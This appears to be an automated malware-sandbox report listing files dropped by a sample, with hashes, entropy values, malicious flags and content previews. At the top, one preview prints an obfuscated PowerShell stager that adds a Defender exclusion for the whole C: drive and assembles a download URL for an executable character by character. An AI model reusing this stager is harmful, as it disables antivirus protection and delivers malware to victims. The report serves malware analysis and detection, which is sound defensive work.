                                                                                                                                                                                                                                                  Preview:# .......... . ...........$alias = "IEX".$cmd = 'Add-MpPreference -ExclusionPath "C:\"'..# .......... ........& $alias $cmd..# ........ 10 .......Start-Sleep -Seconds 10..# .......... . ................ ........$z1 = "h"; $m2 = "t"; $l3 = "t"; $f4 = "p"; $x5 = ":"; .$j6 = "/"; $a7 = "/"; $s8 = "1"; $n9 = "3"; $t0 = "8"; $g7 = ".";.$g1 = "1"; $q2 = "2"; $h3 = "4"; $u4 = "."; $b5 = "6"; .$v6 = "0"; $o7 = "."; $p8 = "1"; $y9 = "3"; $cw0 = "3"; .$eg1 = "/"; $i2 = "l"; $k3 = "e"; $w4 = "m"; $r5 = "."; .$y6 = "e"; $c7 = "x"; $e8 = "e";..# ......... URL . ...............$europe = ($z1 + $m2 + $l3 + $f4 + $x5 + $j6 + $a7 + $s8 + $n9 + $t0 + $g7 + $g1 + $q2 + $h3 + $u4 + $b5 + $v6 + $o7 + $p8 + $y9 + $cw0 + $eg1 + $i2 + $k3 + $w4 + $r5 + $y6 + $c7 + $e8);..# .... ... .......... ..... . ................ ....... ...........$dirPath =
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):947288
                                                                                                                                                                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):369373
                                                                                                                                                                                                                                                  Entropy (8bit):7.999479085447109
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:6144:FJQdJwo8s+9cpRF3C9Wa84DAX33LxQ7rB1Wkstu7pKLwmmdW2kaVXF2HPHKr2GH:FJQsANZ4cX37xqds2QcmAKaVXF2vqr2G
                                                                                                                                                                                                                                                  MD5:E805CD0F799D0AD76BDB49FAEF798D13
                                                                                                                                                                                                                                                  SHA1:41C8D79A6727403BBBB9B0E8D98887A3A7A8D8CB
                                                                                                                                                                                                                                                  SHA-256:B1F7C0ED244E054DD5EAE5FF022131ED9727543A4D0CDB6235C2D3723D2C4835
                                                                                                                                                                                                                                                  SHA-512:77A7560377610E97A103EE51E1945ACE4673F80D6F57A2475E613729474C9EB047C7088650EDB20FAA3862C67E274074E1DCEDB3646BFB4E5A91AC9E77EF6139
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):93184
                                                                                                                                                                                                                                                  Entropy (8bit):6.160455964027194
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:AFfTubb1/Dde6YF640L6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWccd0U:AFfTut/Dde6u640ewy4Za9coRC2jfTqH
                                                                                                                                                                                                                                                  MD5:7E00B549662A27E8F4A9DC5F950FD8E7
                                                                                                                                                                                                                                                  SHA1:ECBC302511819C0AF9BF7B990AA3623873AE2A2A
                                                                                                                                                                                                                                                  SHA-256:811039F826716917239C503F5797ABA4B57880E700B102F8C202DF9CA4C2AC37
                                                                                                                                                                                                                                                  SHA-512:C110B335341F09FF06E8AD0558E495356EE83452BE570BA60417859A2F371876D9F760E265F2146E42E328402336B96324DFE2B79CA494A5A77D926A169C72A1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):75776
                                                                                                                                                                                                                                                  Entropy (8bit):4.144986056310104
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:BKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3z:BKaj6iTcPAsAhxjgarB/5el3z
                                                                                                                                                                                                                                                  MD5:7E6A03C749F54958AB60313137E6610E
                                                                                                                                                                                                                                                  SHA1:9F62D8F217558154E2DB9C970C1257C8E16DB6BD
                                                                                                                                                                                                                                                  SHA-256:CC3F1B74CF6DD7C88D42F5B29E089F1937613F8BB6E2274A94E7461B55795FF0
                                                                                                                                                                                                                                                  SHA-512:E555FA28C97E3618C6AC5903F735AC6919D69528F8A53E5DC0B3B546451A92C7797BC3945E60FCEE1A6550DB5C3E315C91DAE8FF94B1C0E1873EBB86AD38D085
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):97280
                                                                                                                                                                                                                                                  Entropy (8bit):6.5722629420970895
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:in+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bU:i+AqVnBypIbv18mLthfhnueoMmOqDoig
                                                                                                                                                                                                                                                  MD5:84B74DA383C7061D1F67A002DD8C47F7
                                                                                                                                                                                                                                                  SHA1:DC909E77B77059D86FD7FA99471F93029DD66A2F
                                                                                                                                                                                                                                                  SHA-256:1C9B9CC68B82CFC34B542CFDB143A9EAA6F63EC17065DF8608EAE27F8A667579
                                                                                                                                                                                                                                                  SHA-512:C09F0665456327859DC89C93C5D55289AFDF9657A226304D4871ED4C02DC26B8DDB7747941F136FD854C5A754E37299EB808288F80ABDF75CE1B0BF83AC82DE4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (664), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16713
                                                                                                                                                                                                                                                  Entropy (8bit):5.13717215388457
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
                                                                                                                                                                                                                                                  MD5:DC0C5150CCFAA34C9472DF04D06B401E
                                                                                                                                                                                                                                                  SHA1:F7929242A75E8C48E0FD6FAF8688D2267A35F518
                                                                                                                                                                                                                                                  SHA-256:6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
                                                                                                                                                                                                                                                  SHA-512:772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S
                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (664), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16713
                                                                                                                                                                                                                                                  Entropy (8bit):5.13717215388457
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:TJpziSlvMGEoGA4CW1Shn9YeMNW8UGCTnUJ+9D7IEJ2Qxi1D:flkV7A4w9tMM8UGqUJtE0Qxi1D
                                                                                                                                                                                                                                                  MD5:DC0C5150CCFAA34C9472DF04D06B401E
                                                                                                                                                                                                                                                  SHA1:F7929242A75E8C48E0FD6FAF8688D2267A35F518
                                                                                                                                                                                                                                                  SHA-256:6A0790F679AEC429C210B455605E4169612C1371CC2CBABA0848CD788CF4D851
                                                                                                                                                                                                                                                  SHA-512:772F2826F31D04451D2774E9EF987C15E45C45309349FBE9EE7B130F46FB61DC428921D168FEADD74DA8DFA26C855B2C3831210B3511048B0966F1F4334472CD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:Set Financing=I..ptNBull-Architectural-Languages-Bring-Cool-Reliance-..iCXIon-Investigator-..owXhDisciplinary-Faq-Eyed-..ehLeads-Belgium-Subject-..CfValentine-Threatened-Restoration-..SmKinase-Procurement-Cube-Told-..Set Pink=t..qmiEquipped-Verizon-Increases-Newer-Eg-Compromise-Plenty-Intel-..EELNike-Affected-..zjPharmaceuticals-Ja-..hsMovers-Televisions-..AmDDelivery-Awareness-Complaint-Preserve-Honors-Discussed-Miracle-Gabriel-..FJCombination-..Set Answering=H..vupEqually-Islands-..usAbilities-Updated-Rarely-Denial-Bidding-Dirt-Checked-..XoOFiscal-Optimal-Vast-Further-Affected-Wants-..RRThong-Edge-..HAUWhen-Synopsis-Becoming-..VqBuried-Kathy-Milan-Apollo-Sheer-..ghUSaudi-Mileage-Detection-Unity-Infinite-Eric-Usa-Lenses-..Set Launched=5..JMdMedieval-Mind-Foul-Infection-Baths-Efforts-..IwRComplicated-Metals-Preserve-Forever-Genes-Demonstrates-Ltd-Delhi-Envelope-..nVuEBritannica-Ff-Federation-Lakes-Romance-Porsche-Subsection-Balanced-..eVsQDefinitely-Letters-Assure-Avenue-Zdnet-Agents-S
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):90112
                                                                                                                                                                                                                                                  Entropy (8bit):6.825606182838265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:YYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOEg:fWy4ZNoGmROL7F1G7ho2kOF
                                                                                                                                                                                                                                                  MD5:02B5952F3F0B3EF33C6AD0EE50BA13D3
                                                                                                                                                                                                                                                  SHA1:0F7F1A5C9AD674098B380962EDDFB8E2499C28CF
                                                                                                                                                                                                                                                  SHA-256:E17E9751D3E04A043DE086B4B26AE59A1DCF8B6C838FCC42B0CD2B47B807774C
                                                                                                                                                                                                                                                  SHA-512:1226748B8810BCE5665C43A0E8CF3F6585ED2A2A9B4DC93B9FE1BB301898CFA120C0FBDF96CA8B5E3C31960521836E87A7326F2AA4A374666D5A3B53277A048F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:n.t.s. .a.r.e. .n.o.t. .a.l.l.o.w.e.d...".V.a.r.i.a.b.l.e. .m.u.s.t. .b.e. .o.f. .t.y.p.e. .".O.b.j.e.c.t."...1.T.h.e. .r.e.q.u.e.s.t.e.d. .a.c.t.i.o.n. .w.i.t.h. .t.h.i.s. .o.b.j.e.c.t. .h.a.s. .f.a.i.l.e.d...8.V.a.r.i.a.b.l.e. .a.p.p.e.a.r.s. .m.o.r.e. .t.h.a.n. .o.n.c.e. .i.n. .f.u.n.c.t.i.o.n. .d.e.c.l.a.r.a.t.i.o.n...2.R.e.D.i.m. .a.r.r.a.y. .c.a.n. .n.o.t. .b.e. .i.n.i.t.i.a.l.i.z.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r...1.A.n. .a.r.r.a.y. .v.a.r.i.a.b.l.e. .c.a.n. .n.o.t. .b.e. .u.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .c.o.n.s.t.a.n.t...5.C.a.n. .n.o.t. .r.e.d.e.c.l.a.r.e. .a. .p.a.r.a.m.e.t.e.r. .i.n.s.i.d.e. .a. .u.s.e.r. .f.u.n.c.t.i.o.n.........I.n.v.a.l.i.d. .f.i.l.e. .f.i.l.t.e.r. .g.i.v.e.n...*.E.x.p.e.c.t.e.d. .a. .v.a.r.i.a.b.l.e. .i.n. .u.s.e.r. .f.u.n.c.t.i.o.n. .c.a.l.l...1.".D.o.". .s.t.a.t.e.m.e.n.t. .h.a.s. .n.o. .m.a.t.c.h.i.n.g. .".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t...2.".U.n.t.i.l.". .s.t.a.t.e.m.e.n.t. .w.i.t.h. .n.o. .m.a.t.c.
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                  Entropy (8bit):7.996798534009921
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:OmBqjLBskqmgCub7WmH9DT1enI0Va/FJ2GkX5DMamIWSxEz:OmojLeN37ZH9f1eDAdo4tSK
                                                                                                                                                                                                                                                  MD5:3D3482F49381B6FD0830558DEC464625
                                                                                                                                                                                                                                                  SHA1:705C9181F55B2F4276D3689F8BED0EC25489877E
                                                                                                                                                                                                                                                  SHA-256:476B64C0A243B52CB8B4BEBA0634E77CD176FD1D15C8D8E08DB41B67585E7C1C
                                                                                                                                                                                                                                                  SHA-512:5777023FD4AF5D1A1DCF784E477D29B2B445BB73572D3D31208C4E5986A015FFA1D09AB65A709775723772FFF705F25F983BA228A72062F49D82964D18F9002B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):134144
                                                                                                                                                                                                                                                  Entropy (8bit):6.674977789477399
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:1BRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESA:DNPj0nEo3tb2j6AUkB0CThp6A
                                                                                                                                                                                                                                                  MD5:8FEC4166BA86F7AC86DA9F06ABE49557
                                                                                                                                                                                                                                                  SHA1:5927648717AD20DBC2B9C1EB30CB5CF990182128
                                                                                                                                                                                                                                                  SHA-256:446CF37FD6B4C78C054185EC6D54823A0FDD3282FCA99B958B29E23CB4B075A0
                                                                                                                                                                                                                                                  SHA-512:A9812F1D24434ECABFC9F9781C29BED83B56619E544A21F018C454565A0EBA447B0B66B3F78ABE42BF227CC1F0E6959576328EA9F6A2776771CE7E5CD2F1E7C4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):76800
                                                                                                                                                                                                                                                  Entropy (8bit):6.686304303605537
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:8Y464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cy:t4qv+32eOyKODOSpQSAU4Cy
                                                                                                                                                                                                                                                  MD5:83828D024D7CAA17F6E52969E845D8E0
                                                                                                                                                                                                                                                  SHA1:FB7538D9D4B604B128828B4CAD2F53CD2195D9C1
                                                                                                                                                                                                                                                  SHA-256:BE0CCB43F0E2AA9090CECE1093DC56131AD5CC655D5CA35A53306CEFCEF56F8E
                                                                                                                                                                                                                                                  SHA-512:41C95DD45EBB805A45CFEB197CACC830F9AC895FB966AC94CC688A206747E9BA3149A7698B1194CD4AD9B7C30CA571FEA115F22D8DF844472BA7E6D1D14782D7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):88064
                                                                                                                                                                                                                                                  Entropy (8bit):5.541206148230026
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:5KPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mex/S+:58QuklMBNIimuzaAwusPL
                                                                                                                                                                                                                                                  MD5:6689078E7ECA2AE3429263C902005A36
                                                                                                                                                                                                                                                  SHA1:13348F7B86189E5BE3C1CF577235159B797C09BE
                                                                                                                                                                                                                                                  SHA-256:FFDBABA35048B7F354D030F47A9431FA5C752E469B87276075260904A07E08E4
                                                                                                                                                                                                                                                  SHA-512:E18BB61E6858598DF3A132B624A413F9427132222175EDA6E91E1D95479852AFB656D68F15D6321BD08E2910120DD45BB38655CA9AAA748150A4DEA16FB818D9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):116736
                                                                                                                                                                                                                                                  Entropy (8bit):6.310961115368738
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:zg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UT:85vPeDkjGgQaE/loUT
                                                                                                                                                                                                                                                  MD5:0FEF43A1D2F278AD03BB846A85EB2504
                                                                                                                                                                                                                                                  SHA1:1432D6AA98F4C9C45127DB74B5C02365B0B1569A
                                                                                                                                                                                                                                                  SHA-256:5EA9933E7E3138736B9492660E6A83696401F8E6F8041C85B1ECD28D307D5790
                                                                                                                                                                                                                                                  SHA-512:AB2C3BB2BD452FCA44120D6F3914D1E436F1EE85129251CD8CA9F4B4BBE7805E5508905B74D9702E402A0C05285A7E104CD00FFA476C4B7B67B17B4070A55C20
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):71389
                                                                                                                                                                                                                                                  Entropy (8bit):7.997603584249478
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:MT2ZVYAoeVFwNjlHzGOVEEHHK/95xfgDpkCijTCGXRz21cvGBY3exC:O2ZVNVFUlHVNHHK/DCzOCGhy1o+9xC
                                                                                                                                                                                                                                                  MD5:205B1F531DC790C74D39A1B682C44A3C
                                                                                                                                                                                                                                                  SHA1:BC5DC0B570F685910CE9122781C30BE7438DAB57
                                                                                                                                                                                                                                                  SHA-256:CBC6F6197C066A563511E6B51F02072FF21ECC3FE41C6DE48CA050C22E0B7B43
                                                                                                                                                                                                                                                  SHA-512:F03FE4176022C356A20AB210813A14D3AE4B8FE59E04AE2708DF6CE4CE28A5C5BA873D936578A13FF339506C7619975B70263451334D16D6F75895188B98AC3A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):1025128
                                                                                                                                                                                                                                                  Entropy (8bit):6.5991528155295684
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:KnknHeDU4dmI6Eepd5TsP1Ih0lhSMXlrcsiG/Ch:6knHeVdOEod5+1d7csiG/Ch
                                                                                                                                                                                                                                                  MD5:DE574F7F5256F98F356A2D620C4A2288
                                                                                                                                                                                                                                                  SHA1:1D57D182BB748170F5CEFB7ECF594B4998E113B8
                                                                                                                                                                                                                                                  SHA-256:E831A5AEBC7BD941FA815A9441E552A0BA699F9BD5454036A68CCBB42200353A
                                                                                                                                                                                                                                                  SHA-512:431F3EA61D23028E1C538AF3C808E7213D629615E3CB22B41D44715FF805323DA82880C35BC90FFFE95621132DAD96EAB5BFCC395863F167664A5666369D0D5B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|r..8..8..8..H..4..H....(../..(..)..(..w..H.."..H..9..H.....8.....p..B..p..9..p...9..8.y.9..p..9..Rich8..................PE..L....*Xg.........."!...).....d......`........0............................................@A............................L......@....................j..h:..........p\..p....................].......[..@............0...............................text...j........................... ..`.rdata.......0......................@..@.data...@)..........................@....fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                  Entropy (8bit):7.9977360681233565
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:8KnGbkPNpXFQd4tW9wbuBk5WNJMOcRc+ykpNA9NhJH5Riz4pGLkKtVdEq+loayoX:FJQd4tywoXMVa+9cvhZ5o0plm7+lSijv
                                                                                                                                                                                                                                                  MD5:6B669AEEDE2444CAACAE56D6634856B4
                                                                                                                                                                                                                                                  SHA1:D2F5E1223534F3458B2C537D7F352A7F66ED2E8A
                                                                                                                                                                                                                                                  SHA-256:1D28DBEB808CE4112B273F21EF6F4625F3AD0C99ADC0D5B5FC3BD6CB28D2EA88
                                                                                                                                                                                                                                                  SHA-512:D5D172E91B02B829E8C4BB754C843A69C4B6A34764617505B8C8114F5AE788973673879C017DE1D98D7E47D714DD2BBB512D7BD574349FA2B690384FDB99DEB6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2253
                                                                                                                                                                                                                                                  Entropy (8bit):5.210185147584243
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:B9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLV9:rSEA5O5W+MfH5S1CqlV9
                                                                                                                                                                                                                                                  MD5:6FF1E4F807047A9554FED9CF5520B527
                                                                                                                                                                                                                                                  SHA1:B318525BEA237308E47AC9E54A6AAA86C1C0BAF9
                                                                                                                                                                                                                                                  SHA-256:4511CEBD102C965725C9E68CFE398EA6169BD0C0971FC7C083A32A45E1D31AC6
                                                                                                                                                                                                                                                  SHA-512:95F63CDC70E27C1C69DFC324FCDD275C8124EE67C379D3F358C1EC28AB98DE4D77CE37B89CD2A8BFE3D39867B67AC3692C35AE668C10E384A528DAEEBCBFD077
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\putt.exe
                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):59392
                                                                                                                                                                                                                                                  Entropy (8bit):7.996648286668622
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:1536:cBX1dlaX3yjVMLx08/X5KK8FqluzBxXS+fX:+DAX3yCLxZpNeBNrX
                                                                                                                                                                                                                                                  MD5:CC60353BD3E192565DABB8EE57E563EC
                                                                                                                                                                                                                                                  SHA1:08CD358077018723C047DEA1235D04325C24D655
                                                                                                                                                                                                                                                  SHA-256:1EF7F2E0744B21850649B7BE1231AE3DB5548BAAE3E724B2058513B6AEBCA23A
                                                                                                                                                                                                                                                  SHA-512:F13E0CB0C19E6F61B9D4747E57D60614B91D47B8DFE73E5739BC8BF2F180D2E21D801CC8FD4A1E4F3431F0303F1B2350B80450B1CFEC67C0683470D743D17BE4
